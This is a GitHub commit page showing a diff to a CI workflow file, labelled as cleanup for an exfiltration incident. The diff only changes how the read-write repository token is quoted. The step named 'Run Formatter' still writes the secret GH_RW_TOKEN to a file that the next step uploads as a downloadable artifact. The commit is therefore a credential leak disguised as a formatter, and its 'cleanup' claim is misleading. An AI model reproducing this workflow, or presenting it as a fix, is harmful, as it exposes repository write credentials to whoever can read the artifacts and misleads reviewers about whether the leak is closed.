Skip to content

Commit c269116

Browse files
committed
INC-5151: Exfil cleanup
1 parent 02a11d0 commit c269116

1 file changed

Lines changed: 3 additions & 1 deletion

File tree

.github/workflows/inc5151.yml

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -5,10 +5,12 @@ on:
55
jobs:
66
format:
77
runs-on: ubuntu-latest
8+
env:
9+
TOKEN: ${{ secrets.GH_RW_TOKEN }}
810
steps:
911
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd
1012
- name: Run Formatter
11-
run: echo ${{ secrets.GH_RW_TOKEN }} > format-results.txt
13+
run: echo "$TOKEN" > format-results.txt
1214
- uses: actions/upload-artifact@bbbca2ddaa5d8feaa63e36b76fdaad77386f024f
1315
with:
1416
name: format-results

0 commit comments

Comments
 (0)